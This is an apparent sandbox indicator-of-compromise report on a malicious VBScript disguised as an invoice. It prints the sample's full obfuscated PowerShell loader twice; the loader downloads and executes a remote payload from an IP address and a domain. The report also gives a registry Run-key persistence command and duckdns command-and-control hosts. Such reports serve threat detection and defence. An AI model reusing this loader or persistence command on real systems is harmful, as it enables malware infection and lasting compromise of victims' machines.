IOC Report
Revised Invoice 7389293.vbs

Revised Invoice 7389293.vbs

ASCII text, with very long lines (1629), with CRLF line terminators

initial sample

C:\Users\user\AppData\Roaming\kpburtts.dat

data

dropped

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Revised Invoice 7389293.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"

C:\Program Files (x86)\Windows Mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chooseable" /t REG_EXPAND_SZ /d "%valleculate% -w 1 $Flkkedes=(Get-ItemProperty -Path 'HKCU:\Optagningsmaskiners\').Kesslerman;%valleculate% ($Flkkedes)"

janbours92harbu02.duckdns.org

206.123.148.198

janbours92harbu03.duckdns.org

unknown

206.123.148.198

janbours92harbu02.duckdns.org

United States

6F5B000

heap

page read and write

9B7B000

direct allocation

page execute and read and write